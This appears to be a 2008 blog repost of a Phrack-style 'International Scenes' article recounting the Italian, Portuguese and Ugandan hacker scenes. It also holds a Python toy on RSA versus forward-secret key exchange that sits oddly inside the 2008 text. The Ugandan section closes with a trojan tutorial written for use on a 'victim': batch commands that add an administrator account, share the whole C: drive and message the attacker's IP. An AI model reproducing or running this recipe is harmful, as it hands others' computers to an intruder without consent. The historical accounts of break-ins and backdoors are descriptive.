Friday, October 17, 2008

International Scenes 2008

--------------------------------------------------------------------------

An overview of the Italian underground (1994-2007)


Phrack #47 [0] covered the Italian scene last time, just a few months
after the Italian Crackdown of 1994. This short article is an attempt to
sum up the evolution of the Italian underground since those days.

1994 was the year of the so-called Italian Crackdown (aka FidoBust): a
wide (and wild) Finance Guard operation nominally aimed at busting
warez BBS. A stunning total of nearly 200 BBS systems on the FidoNet
network were seized with irresponsible methods including, but not
limited to, the requisition of all electronic equipment from the sysops
(including modems, cables, keyboards, monitors, ...) as well as the
police sealing whole rooms.

In its first phase the purpose of the operation was to fight the illegal
market of copied software and thereby satisfy the BSA lobby. However
subsequent seizures and raids proved the crackdown also had a political
objective. The bust included BBS that belonged to CyberNet (a network
supporting the motto "INFORMATION WANTS TO BE FREE", populated by
hackers and cyberpunks alike, close to social centres), ECN [1]
(european network dedicated to broadening political debate and providing
counter-information about social themes and workplace politics) and
PeaceLink [2] (peace/ecologist association and network).

Though just a few BBS were really involved in selling warez, a lot of
completely legal BBS closed as a result of the bust and never reopened.

As new people were being busted, the national press did its best at
building castles in the air about hackers, describing them as software
pirates or members of organized crime. The underground reacted by
striking at the credibility of the media with a round of actions signed
with the multiple-use name Luther Blissett [3]. The campaign used hoaxes
and communication guerrilla to expose the unreliability of journalists,
and even managed to have Mondadori, the second most important publishing
company in Italy, print an entirely *fake* book, "Netgeneration" (1996).

As a consequence of the crackdown the Italian underground started
feeling the need for an organization similar to the American EFF, able
to support hackers against abuses. In 1995 ALCEI Electronic Frontiers
Italy [4] was founded to "affirm and protect constitutional rights for
electronic citizens as new communications technologies emerge".

Nearly at the same time, Metro Olografix [5] was born, an association
made up of people with a mixed range of skills and histories, from
cyberpunks and hackers to social volunteers, that nowadays counts about
80 members. The main mission of Metro Olografix is to spread telematics
culture throughout the country, supporting the old BBS spirit of
sharing, free communication and cooperation. Metro Olografix has an
office in Pescara for real-life meetings and acts as a crossroads for
other groups and individuals to meet. Thanks to the esteem and trust
gained from most of the Italian underground, the association was able to
organize events like "L'hacker e il magistrato" ("The hacker and the
magistrate", from 1995 to 1999), a face-to-face conference involving
hackers, magistrates and press reporters, aimed at explaining the
difference between hackers who follow the hacker ethic and actual
criminals.

While BBS were still experiencing hard times, 1995 saw the boom of
Internet access in Italy - mainly thanks to the VOL ISP, which offered
free promotional accounts, opened POPs in many cities reachable with a
cheap urban-rate call and at the beginning even provided a toll-free
number. Internet access was no longer limited to universities, and the
opportunity to have a relatively fast, cheap and long-lasting Internet
SLIP (later on PPP) connection from home marked the growth of a new
generation of young hackers. Those guys started to study and play with
the TCP/IP protocols, and they chose the Linux open-source operating
system and the C programming language as their favourite subjects of
study. Within a few years those wannabes would inject new ideas into the
Italian underground and create some valuable projects and groups.

Like the new generation, old-school BBS hackers too got very interested
in the communication opportunities offered by the Internet. Thanks to
"Isole nella Rete" [6] (Italian for "Islands in the Net"), the Internet
connection of ECN, BBSs of the CyberNet circuit began to put their
contents online. Message areas turned into mailing lists and IRC
channels like #cybernet were born on EFNet.

From 1987 to 1998 *the* fanzine of the Italian underground was Decoder
(published by ShaKe Edizioni Underground, a cyberpunk cooperative based
in Milan): covered subjects included hacking, hacktivism, networks,
cyberpunk culture, counter-information, leading figures and events from
the international scene, virtual reality and new technologies. While
Decoder was the only printed underground zine during those years, a few
hacking/phreaking e-zines were also released: The DTE222 Technical
Journal (1987) and The Black Page (1994). Although those experiences did
not last as long as Decoder and did not focus on the international
scene, their technical level was considerable.

In 1996 the first issue of System Down was published, an e-zine written
by some users of the IRCNet channels #cybernet and #hackers.it. The
quality and technical level of the articles dropped compared to previous
zines, since the authors were mostly young guys who had started hacking
just after the Internet boom and were not very conscious of hacker
culture or of the past work of the Italian underground.

1997 saw a flourishing of new groups that approached hacking mostly as
study and research about programming, networks and operating systems,
instead of grasping its political value and focusing on its consequences
for society. In the beginning the members of those organizations were
for the most part low-skilled, but many of them were highly motivated,
tenacious and capable of learning quickly, and they reached a very good
technical level in very few years.

Orda delle Badlands was a crew especially dedicated to owning systems on
the Internet and to ircwar (a deplorable activity, but widely practised
in those times). The experience ran out within a few years, because what
drove the group was in fact participation in actions launched by its
charismatic leader (who was nearly worshipped); in the long run that
proved an insufficient incentive, the crew closed and some of its members
joined other groups.

Antifork [7] (formerly known as disLESSici) is more a 'hackers research
virtual lab' than a crew: a place where hackers can share their
techniques and code following open-source and full-disclosure
philosophies. Among Antifork's members are also the creators of
well-known tools like ettercap. Antifork software is available through
their website and public-access CVS.

The S0ftpj [8] group brought together people with different skills and
backgrounds: cyberpunks, sysops, coders, virus writers, security and
privacy researchers, hardware and network experts. Since the beginning
the group has stood out for its will to collaborate and engage with
other realities of the Italian underground (this explains the notable
amount of its releases distributed via its website). S0ftpj's skills
cover a wide range of fields - it has been contributing to many events
in the country, holding workshops mainly focused on its research in
kernel hacking and new privacy-enhancing technologies.

Meanwhile, as these new groups were appearing, the fusion between
ECN/CyberNet hackers and the squat scene led in 1998 to the first
Hackmeeting [9], a yearly 3-day hacker con "without *organisers,
teachers, public and customers* but with *sharers*", held in a T.A.Z.
[10] and totally self-organized. Although the level of its talks is not
always very high, Hackmeeting has become a unique opportunity to have
fun and discuss with people from different realities and to feel the
informal atmosphere of old times - free of commercial influences. In
1999 the second Hackmeeting promoted the idea of "hacklabs",
laboratories mainly hosted by social centres where hackers could meet in
person to share and develop their do-it-yourself attitude and their
knowledge about programming, technologies, media activism, privacy and
cyber-rights. After Freaknet Medialab [11], the first Italian hacklab
and home of radio#cybernet, opened in Catania in 1995, other hacklabs
sprang up in the biggest cities of the country (Florence, Milan,
Bologna, Turin, Rome).

In spring 1998, when System Down stopped publication, S0ftpj and Orda
delle Badlands started a new e-zine called Butchered From Inside (BFi)
[12] that dealt with various topics (h/p, viruses, reversing, reports
from cons, underground culture, ethics) following a semi-disclosure
policy (no complete, ready-to-use exploits and tools, but techniques).
At first the technical level of the articles was low, but it quickly
improved, and from its second year it already distinguished itself by
the originality and quality of its articles. BFi documented the growth
of new characters in the Italian scene; over time it adopted an
acceptance policy for articles similar to the one used by Phrack, and
today it is also read by non-Italians thanks to its English, French and
Spanish translations. BFi is written by hackers belonging to many
organizations, by independent researchers and, obviously, by S0ftpj
members, who have been editing and contributing over these years.

BFi has set an example of the good spirit and built a virtuous circle
where new ideas and techniques, first explained in its articles,
inspired other hackers to develop them further and publish them in later
articles. The feeling of a steady continuity between works by different
contributors was strong, so BFi launched successful collaborations
between hackers. In autumn 2001, BFi hosted an important debate about a
subject that had been in the background for a long time but had not yet
been discussed publicly: the feasibility of hacking without political
connotations. That topic of course was not exhausted on that occasion
and would resurface periodically; the discussion anyway helped all
parties to reflect on it and engage with each other: the "politicals"
understood that a big effort in experimenting with new techniques was
becoming fundamental to fight their battles efficiently, while the
"technicals" acquired a stronger consciousness of their actions.

Sikurezza.org [13] has been another good project aimed at fostering
discussion about computer security. It was established in 1999 with a
few open mailing lists, where advanced topics could be talked over by
hackers in a vendor-free, non-profit and full-disclosure atmosphere.
Unfortunately, in parallel with the dramatic increase in subscribers and
posters, the technical level of posts has progressively and inevitably
decreased over the years, although the list still represents an
important community, also respected by the underground. Moreover,
researchers presenting themselves under the Sikurezza.org umbrella set a
new style and quality standard for security talks at events held in
Italy.

Other active hacking groups in those years were Spippolatori, Packet
Knights Crew and S.P.I.N.E.: some of them released interesting stuff,
but they had all closed by 2005. There were also many attempts to start
new e-zines. Apart from OndaQuadra, which contained a few nice articles,
the quality was low, and every new e-zine started talking about hacking
from a very basic level instead of building on the input of previous
editorial experiences.

New-school Italian phreakers have mostly been interested in studying
PSTN/ISDN, phone kiosks and magnetic cards, cellular cloning and VoIP.
BFi published various articles on Fastweb, the biggest national
fiber-optic ISP. Fastweb's Milan metropolitan network has been the
favourite playground for pioneering VoIP and IPTV hacking. Since 1998
the Spaghetti Phreakers [14] website and mailing list have been an
archive and meeting point to experiment and learn, and have helped keep
interest in phreaking alive among the new generations.

The Italian underground counts talented reverse engineers and software
crackers; some of them have been members of renowned international
cracking groups or of the cracking university +HCU. Websites like
Universita' Italiana Cracking [15] (resembling the teaching style of
+HCU) and 3564020356 [16] have been running for many years and provide
nice communities and huge archives of tutorials and technical documents.
RingZ3r0 and RACL were two other groups that published good textfiles
about reversing, but they are no longer active.

Italy is a country with a long and prolific artistic tradition, and the
underground has its own artists too. There have been many good demo
groups (for a comprehensive list, check the site Scene-IT [17]) and
some demo parties: "The Italian Gathering", organized by Metro
Olografix from 1996 to 1998 in Pescara; a demoscene area within Codex
Alpe Adria [18] (a wider event also featuring retrocomputing, emulation
and alternative systems) from 2004 to 2006 in Udine; and since 2007 the
HORDE [19] demoparty. Prof. Bad Trip [20] has been a peculiar
experimental artist capable of interpreting cyberpunk, offering a visual
perspective on themes like cyborgs, mutants, the polluted metropolis of
a disturbed future and so on. Finally, it is worth mentioning the
graphic novel "Uccidere un Hacker" [21] (Italian for "Killing a
Hacker") by Andrea Ferraresso, inspired by the story of the German
hacker Karl Koch.

In the field of privacy, a milestone was set in 1998 with the book
Kriptonite [22], written by hackers from ECN/CyberNet. Kriptonite
extensively covered the theory and practice of topics like cryptography,
anonymous remailers, nym servers, steganography, voice encryption and
packet radio.

Somewhat influenced by Kriptonite, Progetto Winston Smith (PWS) [23] has
been working since 1999 to raise netizens' awareness of the risks of
technocontrol and network surveillance. PWS maintains a website
providing information about privacy-enhancing technologies, for both
administrators and end users. Moreover, every spring PWS organizes in
Florence a free convention called E-Privacy [24]. The con runs in two
tracks where privacy-related topics are discussed at the legal and the
technical level; it also hosts the local ceremony of the Big Brother
Awards for the year's worst privacy violators in Italy. Besides
E-Privacy there were other events about privacy and freedom organized
by Metro Olografix, like the Metro Olografix Crypto Meeting and Cyber
Freedom.

Autistici/Inventati (A/I) [25] was born in 2001 as a collective of
people from hacklabs and media activists, and its main effort has been
to build a server offering free services like web/blog/mail hosting, an
anonymizer, an anonymous remailer and mailing-list management for
activists and people who want privacy. The A/I server, because of its
policy devoted to free speech, had to be defended in court many times.
In summer 2005, A/I discovered that its server had been physically
compromised and that the Italian police had had access to its SSL keys
(which allowed them to monitor all the traffic for a whole year: with
the RSA key exchange commonly used at the time, which offers no forward
secrecy, a copy of the server's private key decrypts every recorded
session, past and future). The collective reorganized and deployed the
so-called "R* Plan": a fresh decentralized, redundant network
infrastructure with servers located in different countries and
jurisdictions. As for every service it provides, A/I made the technical
documentation for Plan R* [26] available on its site. Thanks to the
work of PWS, A/I and individuals, Italy boasts various Tor and Freenet
nodes as well as anonymous remailers and nym servers.
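As an added illustration of why the stolen keys mattered so much (this is not A/I's code and not real TLS, just a toy model with tiny constructed keys), the following Python sketch compares the two kinds of handshake. Under RSA key exchange the recorded handshake carries the premaster secret encrypted to the server's long-term key, so whoever obtains that key later can derive every session key from old captures. Under ephemeral Diffie-Hellman the long-term key only signs the server's ephemeral share, so a stolen key enables future active interception but not retroactive decryption. The primes, the generator and the `session_key` stand-in for the TLS PRF are assumptions of the example.

```python
# Added toy model (not A/I's code, not real TLS): why a stolen long-term server key
# decrypts *recorded* sessions under RSA key exchange but not under ephemeral DH.
import hashlib
import secrets

# --- Toy server key: textbook RSA over tiny constructed primes (illustration only) ---
P, Q = 1000003, 1000033
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))          # private exponent (Python >= 3.8)

# --- Toy DH group: the Mersenne prime 2**127 - 1 with generator 3 (constructed) ---
DH_P, DH_G = 2**127 - 1, 3


def session_key(premaster: int) -> bytes:
    """Stand-in for the TLS PRF: derive the traffic key from the premaster secret."""
    return hashlib.sha256(premaster.to_bytes(32, "big")).digest()


def rsa_sign(msg: bytes, d: int = D) -> int:
    """Textbook RSA 'signature' over a hash (toy; no padding)."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    return pow(h, d, N)


def rsa_verify(msg: bytes, sig: int) -> bool:
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    return pow(sig, E, N) == h


def handshake_rsa():
    """RSA key exchange: the client encrypts the premaster to the server's public key.
    Returns (what a sniffer sees on the wire, the key both endpoints derive)."""
    premaster = secrets.randbelow(N)
    transcript = {"kx": "rsa", "enc_premaster": pow(premaster, E, N)}
    return transcript, session_key(premaster)


def handshake_dhe():
    """Ephemeral DH: the long-term key only *signs* the server's ephemeral share."""
    y = secrets.randbelow(DH_P - 2) + 1                # server's ephemeral secret
    server_share = pow(DH_G, y, DH_P)
    sig = rsa_sign(server_share.to_bytes(16, "big"))
    x = secrets.randbelow(DH_P - 2) + 1                # client's ephemeral secret
    client_share = pow(DH_G, x, DH_P)
    assert rsa_verify(server_share.to_bytes(16, "big"), sig)   # client authenticates server
    shared = pow(client_share, y, DH_P)                # server side: g^(xy)
    assert shared == pow(server_share, x, DH_P)        # client side agrees
    transcript = {"kx": "dhe", "server_share": server_share,
                  "sig": sig, "client_share": client_share}
    # x and y are discarded after the handshake; only the shares were on the wire.
    return transcript, session_key(shared)


def eavesdropper_recover(transcript: dict, stolen_d: int):
    """Passive attacker who recorded the handshake and later obtained the private key."""
    if transcript["kx"] == "rsa":
        return session_key(pow(transcript["enc_premaster"], stolen_d, N))
    # DHE: nothing on the wire is encrypted to the server key; recovering g^(xy)
    # from g^x and g^y alone is a discrete-log problem, and x, y were never stored.
    return None


def attacker_can_forge_share(stolen_d: int) -> bool:
    """The stolen key still enables *future* active MITM: sign an attacker-chosen share."""
    fake_share = pow(DH_G, 12345, DH_P).to_bytes(16, "big")
    return rsa_verify(fake_share, rsa_sign(fake_share, stolen_d))


if __name__ == "__main__":
    wire, key = handshake_rsa()
    print("RSA kx, key recovered from capture:", eavesdropper_recover(wire, D) == key)
    wire, key = handshake_dhe()
    print("DHE kx, key recovered from capture:", eavesdropper_recover(wire, D) == key)
    print("DHE kx, future MITM possible with stolen key:", attacker_can_forge_share(D))
```

The lesson carried over to real deployments is that, once a host is physically compromised, every recorded session protected only by the server's RSA key must be treated as disclosed; forward-secret cipher suites limit the damage to the window in which the attacker can also act as a man in the middle.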

From this short history the reader might conclude that the underground
in Italy is very healthy, but unfortunately the expression
"zombie-scene" used by Duvel in the last Phrack issue [27] fits its
current status well.

An alarming fact is the large number of people once in the underground
who now collaborate with computer crime units or work for companies
providing malware and services to law enforcement agencies. These people
have contributed greatly to the death of the underground in Italy: even
when they did not consciously fight other hackers, the lack of trust and
the paranoia acted as disintegrating forces on groups and
collaborations. The underground has shown not only that it is not strong
enough to refuse to work for law enforcement, but that it is not even
able to isolate people who publicly claim to participate in and belong
to the underground while at the same time working for the police.

Wounds are inflicted on the underground not only by those who explicitly
want to strike it, but also by entities willing to exploit it. The
Hacker Profiling Project (HPP) applies criminal profiling methodology to
enable analysts to identify the kind of attacker and to anticipate his
next moves. It tries to accomplish its goal by collecting questionnaires
from hackers and deploying honeynets. Although HPP's creators, who are
Italian, promote their work among hackers stating that they want to
break stereotypes about the hacker figure, this sounds a bit bizarre...
their real goals are quite evident to everybody. Zone-H [28] is another
attempt to suck from the underground while giving back shit to it. Its
archive of defaced websites lacks the good spirit of the old
Attrition.org, and the primary purpose of the portal's activities is to
keep the perception of an evil hacker menace high in order to sell more
ethical hacking courses and services. The organization has been able to
attract a few young guys and exploit them in borderline actions (the
founder was arrested in connection with the Telecom Italia spying
scandal [29]). It seems that in Italy the more people use the word
"ethical", the less they prove to really have an ethic.

Like everywhere, nowadays many Italian hackers are in the security
business and have stopped releasing their advances and work through
underground channels. The problem is not that they speak at commercial
cons, but the limited amount (and sometimes the lack of free access) of
knowledge they usually provide at such events. Those people largely
made their bones inside the underground communities and learnt a lot
from underground publications and releases. It is therefore desirable
that hackers working in the security field keep showing their slides at
cons but also give back to the underground what it deserves, that is, a
detailed view of their research so that other hackers can study, learn
from and improve (or thwart, this is part of the game, sorry) it.

In this discouraging scenario the Hackmeeting community has always
managed to wake up a few months before the yearly meeting and make it a
nice event, but it has had difficulty building a continuity of
activities during the rest of the year between consecutive meetings. The
number of hacklabs in the country has also decreased in recent years. In
2004 Metro Olografix organized MOCA, a hacker summer camp held in
Pescara that resembled the CCC camp and was a great success. The
experience is likely to be repeated in summer 2008. In recent times
Net&System Security has stood out among technical cons because of the
medium-to-high quality of its talks; the con is held every year in Pisa.
The old groups appear dormant and only a few public releases are
published. BFi magazine also progressively decreased its number of
articles per year until 2006, but last year marked a reversal of this
trend, which leaves room for hope of a renewal of activity in the near
future. A few new groups have released good stuff, but their names are
not cited here because they are not underground-only oriented - they
also offer business solutions.

The Italian underground is still active, but most of the old hackers
keep a low profile and rarely make their work publicly available. Most
group and e-zine sites have been taken offline by their staff, depriving
the new generations of access to a part of the underground's history and
culture. The underground should exploit new web technologies to regain
its past visibility and influence (do "media saturation" and "cDc"
remind you of anything?) on young talents, to offer an alternative
perspective to the one proposed by the world of commercial security.

Hackers now employed in the ICT industry should understand the risk of
the underground dying, and make an effort to spread the knowledge coming
from their research through underground vectors and methods, reaping in
return the benefits of review and comparison within the community.

Limits imposed by new laws and extended technocontrol would hopefully
act as a strong incentive for the underground to get more united and
reactive.

The hackers' role is to make the future more *free*, not (only) more
(IT) secure. Join the underground, keep working for and with the
underground if you care about your freedom, in Italy and everywhere.



[0] International Scenes
Phrack Magazine Volume Six, Issue Forty-Seven, File 21 of 22
http://www.phrack.org/issues.html?issue=47&id=21
[1] E.C.N. European Counter Network
http://www.xs4all.nl/~tank/ecn/
[2] PeaceLink
http://www.peacelink.it/
[3] Luther Blissett
http://www.lutherblissett.net/
[4] ALCEI Electronic Frontiers Italy
http://www.alcei.it/
[5] Metro Olografix
http://www.olografix.org/
[6] Isole nella Rete
http://www.ecn.org/
[7] Antifork
http://www.antifork.org/
[8] S0ftpj
http://www.s0ftpj.org/
[9] Hackmeeting
http://www.hackmeeting.org/
[10] Temporary Autonomous Zone
http://en.wikipedia.org/wiki/Temporary_Autonomous_Zone
[11] Freaknet Medialab
http://www.freaknet.org/
[12] Butchered From Inside
http://bfi.s0ftpj.org/
[13] Sikurezza.org
http://www.sikurezza.org/
[14] Spaghetti Phreakers
http://www.spaghettiphreakers.tk/
[15] Universita' Italiana Cracking (UIC)
http://www.quequero.org/
[16] 3564020356
http://3564020356.org/
[17] Scene-IT
http://scene-it.untergrund.net/
[18] Codex Alpe Adria
http://www.0xaa.org/
[19] HORDE
http://horde.untergrund.net/
[20] Prof. Bad Trip
http://www.profbadtrip.org/
[21] Uccidere un Hacker
http://digilander.libero.it/code6502/
[22] Kriptonite
http://isole.ecn.org/kriptonite/
[23] Progetto Winston Smith
http://www.winstonsmith.info/
[24] E-Privacy
http://e-privacy.winstonsmith.info/
[25] Autistici/Inventati
http://www.autistici.org/
[26] Plan R* Orange Book
http://dev.autistici.org/orangebook/
[27] A brief History of the Underground scene
Phrack Magazine Volume 0x0c, Issue 0x40, Phile #0x04 of 0x11
http://www.phrack.org/issues.html?issue=64&id=4
[28] Zone-H
http://www.encyclopediadramatica.com/Zone-H
[29] Telecom-SISMI Scandal
http://en.wikipedia.org/wiki/SISMI-Telecom_scandal

---------------------------------------------------------------------


The Portuguese Scene
----------------------

(By Eurinomo and Quickzero)



- The evolution of the Internet

When the Internet showed up it was very expensive: even around 96/97 we
had to pay something like 1.50 Euros per hour to the ISP, plus around
1 Euro per hour to the phone company for a dial-up connection.

Some years later the Internet got cheaper, in fact free! ISPs started
racing to give away free dial-up accounts without any time limitation;
they even gave out CDs with already-created accounts. Still, we had to
pay the phone company.

Around 2000/2001, ADSL and cable connections started showing up. They
were fairly cheap, around 35 Euros per month for a 512k connection, plus
15 Euros per month for the phone line or cable. There were no time
limitations, only a traffic limit of around 3 GiB. A lot of people
started showing up online; for most of them the Internet was a new
world. Some people started creating home servers, sharing information,
code and software.

Years later, 24 Mbps connections were made public using ADSL2+, costing
around 35 Euros per month in total with a 60 GiB traffic limit, so people
started taking advantage of this to trade games and movies.

At present, OC connections are available to the public in the capital
(Lisbon); an OC connection of up to 60 Mbps costs something around
50 Euros per month.

In summary, we had a slow start with Internet service, but now we have
a fairly quick evolution.


- The evolution of technology

Technology has always been expensive; even now electronic parts are very
expensive, but computers are getting cheaper and cheaper.

I remember when I bought my first x86: a used Pentium-90 with 16 MiB of
RAM and a 1 GiB hard disk, all inside a heavy big-tower case. It cost
around 700 Euros, bearing in mind that it was a used computer and the
cheapest price I could find; the best computer around at that time was a
Pentium-133. A new computer (Pentium-133) cost around 2000 Euros.

Around 2000/2001 computers started to get cheaper and more people
started to buy them (at that time not many people had one).

Nowadays anyone can buy a good complete computer (or laptop) for less
than 400 Euros.

Only recently, with this cheap technology, has the documentation and
information of the government and other high-level entities met the
digital world; most of it is/was stored in handwritten paperwork.


- The evolution of society

Portuguese people may have a great reputation for sailing and
discovering 'new worlds', but it seems that all this ended a few
centuries ago.

Nowadays society is rather stupid and ignorant: people have started to
lose the pride of being Portuguese, the pride of the world not being
enough for everyone and still having half of it in their hands, the
courage to make discoveries, ending up as people who are happy if they
have food on the table and a good reality show or soap opera on TV.

Society values someone who does something using another person's tools
more than the person who made those tools. For example, they consider an
expert someone who unlocks mobile phones without knowing what he is
actually doing or what is behind it. They give more importance to
someone wearing a tie than to someone dressed normally, and more
importance to someone who doesn't know what he is talking about but has
a PhD or the like than to someone who knows a lot about what he is
talking about but doesn't have any diploma.

The term 'hacker' is not very popular in society; the last time it
appeared on TV was two years ago, in the form of an interview with
someone calling himself 'buzzybee'. He was only a script kiddie who did
some defacing and carding, was proclaiming himself a 'hacker' and showed
up on the news saying that he was able to get free stuff using carding,
that he had access to any site on the Internet and so on. Everyone in
the scene knew this kid's real name, phone, address and age, even though
he hadn't had many problems with the police.


- The evolution of the scene

Finally, the part of most interest: the Portuguese scene is rather
obscure; almost no one outside the scene knows what is in fact going on.
No one knows when the scene really started, since it started before the
boom of telecommunications; a guess is somewhere around the 70s and 80s.

In the 90s some groups started to show up, groups like Kaotik, Pulhas,
Ironik and a few others; even an e-zine came out, called 'PT Zine', but
it died after its third release. Some of the groups still exist to this
day, but not much information comes out of them. Also, some individual
people started to show up in the form of hackers, crackers and
phreakers.

The most notorious groups were:

Pulhas: Founded in 1994 by Kennobi. This was the oldest Portuguese
group. It is now 'dead', but it had its golden age in the 90s thanks to
the innumerable papers its members wrote and the exploit/code database
they provided to the Portuguese mainstream.

Toxyn: Founded in 1996 by m0xx. This group is notorious for its
campaign against Indonesia, when East Timor was occupied by the
Indonesian military. The attack against the Indonesian IT infrastructure
was motivated by the ongoing abuses of Indonesian military officers
against the East Timorese people. Toxyn started their campaign with this
statement: "We hope to call attention to the necessity of
self-determination and independence of the people of Timor, oppressed
and violated for decades by the government of Indonesia. We hope you
give your full attention to this historical step towards freedom; we ask
that you help us fight the tyranny of Indonesia occupying Timor." The
campaign was started on 10/2/1997. The fall of Toxyn began when m0xx
accepted and gave innumerable interviews about the campaign and about
the Portuguese hacker scene, exposing plans and actions of the scene.
The Toxyn group was helped by Savage, a known Spanish hacker, who
developed the exploit that Toxyn used to break into the .ID servers.

KaotiK: Founded in 1997(??). They were a very active group in the East
Timor campaign, and hacked and defaced innumerable .id websites. They
created the first e-zine about hacking & security for Portuguese people;
the e-zine was discontinued after 3 editions. KaotiK reached its fame in
the Portuguese scene after a member disclosed some flaws in various
Microsoft products.

F0rpaxe: F0rpaxe was maybe the most mediatic group/'hacker'/troll, for
the worst reasons. This character was responsible for the first major
attack against US .mil targets in 1999. The attacks were allegedly
carried out in retaliation for Federal Bureau of Investigation (FBI)
raids on suspected "crackers" in several U.S. cities. The attacks hit
various governmental and military webservers, including those of the
FBI, the NSA and the Navy.

East Timor Campaign: This was one of the first major hacktivism
campaigns worldwide. Timor was under Portuguese administration until
1975; after the Portuguese government abandoned the country, Timor was
invaded by the Indonesian military, who oppressed, violated, raped and
murdered for almost 20 years. Various Portuguese hackers and groups
decided to begin a campaign to show the world the truth about the
Indonesian occupation of East Timor. The East Timor campaign started in
1997 and finished in 1999. Various military, government and corporate
Indonesian websites were defaced. The defacements aimed to make everyone
in the world aware of the illegal occupation of East Timor; the mission
was accomplished, as the attacks were reported by media all over the
world. The campaign ended when m0xx, the leader of the group Toxyn, gave
innumerable interviews to the media, exposing the entire Portuguese
scene to the public.

Between 2002 and 2004, two Portuguese hackers also did some 'infamous'
work: they gained access to FCCN ('Fundacao para a Computacao
Cientifica Nacional' / Foundation for National Scientific Computation),
which was backdoored with a reverse ICMP backdoor they developed, and
which rumours say is still active. They also gained access to numerous
universities, which were backdoored the same way; this includes the
100-machine cluster 'Centopeia' at 'Faculdade de Coimbra'. A lot more
work was done, including the database servers of 'A.M. Gonçalves' and
'Salvador Caetano', the Portuguese Toyota distributor. Then they just
disappeared from the scene.

Some of the people inside the scene are found on the x86 '0xD9D0'; those
who know, know what I'm talking about.

At the start of the new millennium there was an explosion of 'lame'
groups: most of them were kids playing with trojans, others were script
kids playing with public exploits; most of these groups are found on a
Portuguese IRC network called PTNet. Some of these kids turned out to be
carders, using databases found by 'Google hacking' or simply by asking
people on some IRC networks. Some of these kids ended up having problems
with the police, but nothing serious.

Also at the start of the new millennium, satellite and cable phreakers
started to show up, breaking encrypted signals. An unnamed box came out
that was plugged into the TV SCART connection and an external 9V power
supply, and unlocked (in fact, it broke the Nagravision encryption)
every single channel there was on cable TV. For a long time this box
was thought to have been made outside of Portugal, until I had the
pleasure of meeting its original creator, and guess what: he was
Portuguese, and lived next to me. He explained to me how it really
worked, and what the original version was like, since the version that
everyone had, which was commercialized by lame groups looking for
profit, had far more components than it needed at all; it even had some
traps, only to make itself more expensive and difficult to make, in
order to keep people from commercializing it. Also, satellite FTA boxes
started to get modified nationally, in order to break satellite TV
encryptions like Nagravision (used by our cable TV provider, 'TVCabo').
So did the original TVCabo cable boxes: some national hackers were able
to hack the firmware in order to get its unique ID (Boxkey), and created
cards that, once plugged in, were able to break the signal. After this,
the knowledge started to become public, but in a 'practical' way, and
lots of people started to make a profit out of it without knowing what
they were really doing. In other words, they knew that if they bought
this and that, and used this and that software, they were able to have
free satellite/cable TV, and they could sell it later to other people.
An example was the first unnamed box that was created: it cost 4 Euros
to build, but people were selling it for up to 100 Euros. So did the
FTA boxes: they cost something around 70 Euros unmodified, and were
sold for 250 Euros modified at no cost.

Nowadays, the scene is still obscure, and people are still ignorant.
Sometimes there is an exception, like when I went to an interview at
a part of the Bosch Group, where the guy interviewing me, on reading my
curriculum, started to laugh silently and said to himself 'A hacker..'
and 'hackers do not harm anyone... only if pushed to', without my making
any mention of illegal activities (duh) or being a member of this or
that group. When I was guessing myself unemployed, I got myself well
employed, and working in more areas than I was asked to; I even got
myself involved with robotics, automation and electronics, when I was
attending the interview as a web developer for an Intranet. Later, we
found out that I already knew him from the scene, and so did he know
me.


-----------------------------------------------------------------------

Ugandan Scene(surprise!!!!!)
============================
by gmac

Introduction
------------

For those who don't know what Uganda is and are too lazy to use Google:
well, in short, it is located on the African continent, more specifically
in Eastern Africa. Still lost? Then this will clear it all up for you:
have you ever heard of a movie called Last King of Scotland? If yes, then
you know Uganda, and if no, then use Google.

Sometime back.....
------------------

Cutting edge computer technology is, as you are correct in assuming,
fairly new in the Ugandan context; it cannot be more than 13 years old,
so generally hacking on our scene had maintained a fairly urban legend
status. Not much is available on any hacking groups back in the day; to
be honest, to my knowledge they were almost non-existent.


Present....
-----------

Currently, as technology advances, the scene has surfaced with the
formation of groups like gsquad by yours truly, which is, I believe, the
first of its kind here. Although hacking has still maintained its urban
legend status, the scene is dominated by a few knowledgeable
individuals. But the winds of change are upon us, because I have seen
the advent of a new generation with a desire which of course has been
fueled by hacker-related movies like, most recently, Die Hard 4.0. The
gsquad remains the only active group providing help to individuals on
request and of course releasing zines (which only recently made a print
debut), which has won many fans but was of course inspired by Phrack.
This new generation needs content, and I think Phrack is our one-stop
Hacking Content Provider (HCP, oh I made that up).

We are latecomers onto the scene, but we will catch up because we have
the spirit. And oh, it was BloodAxe's first appeal that drove me to
start the gsquad, so I hope the circle of lost hackers' appeal will
inspire another individual somewhere on this planet.

We may be in different lands, but we are part of the same underground,
so we will survive the media-caused division which started all these
different kinds of hats I hear of: white hats... erm... black... grey.
We may soon hear of pink hats (i.e. blondes running security sites).

The spirit still lives on, but it's in a critical state......


-:Making your own trojan in a .bat file:-

Open a DOS prompt (we will only need a DOS prompt) and Windows XP...


-Bazics-
Opening a DOS prompt -> Go to Start, then Run (execute), type
cmd and press OK

Now enter this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

OK, in this tutorial we will use 3 of the commands listed here.
They are: net user, net share and net send

We will select some of those commands and put them in a .bat file.

What is a .bat file?
A bat file is a piece of text that Windows will execute as commands.
Open Notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny, ain't it?

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrator access.

Step one -> Open a DOS prompt and Notepad.
The DOS prompt will help you test that the commands are OK,
and Notepad will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo; you can put
any name you want.

Command n 2-> net localgroup administrators neo /add
This is the command that puts your user in the administrators
group.
Depending on the Windows version the name will be different.
If you have an American version, the name of the group is Administrators,
and for the Portuguese version it is administradores, so it's nice
to know which version of Windows XP you are going to try to share.

Command n 3->net share system=C:\ /unlimited
This command shares the C: drive with the name system.

Nice, and those are the 3 commands that you will need to put in your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your IP, and when the victim
opens the .bat it will send a message to your computer,
and you can check the victim's IP.

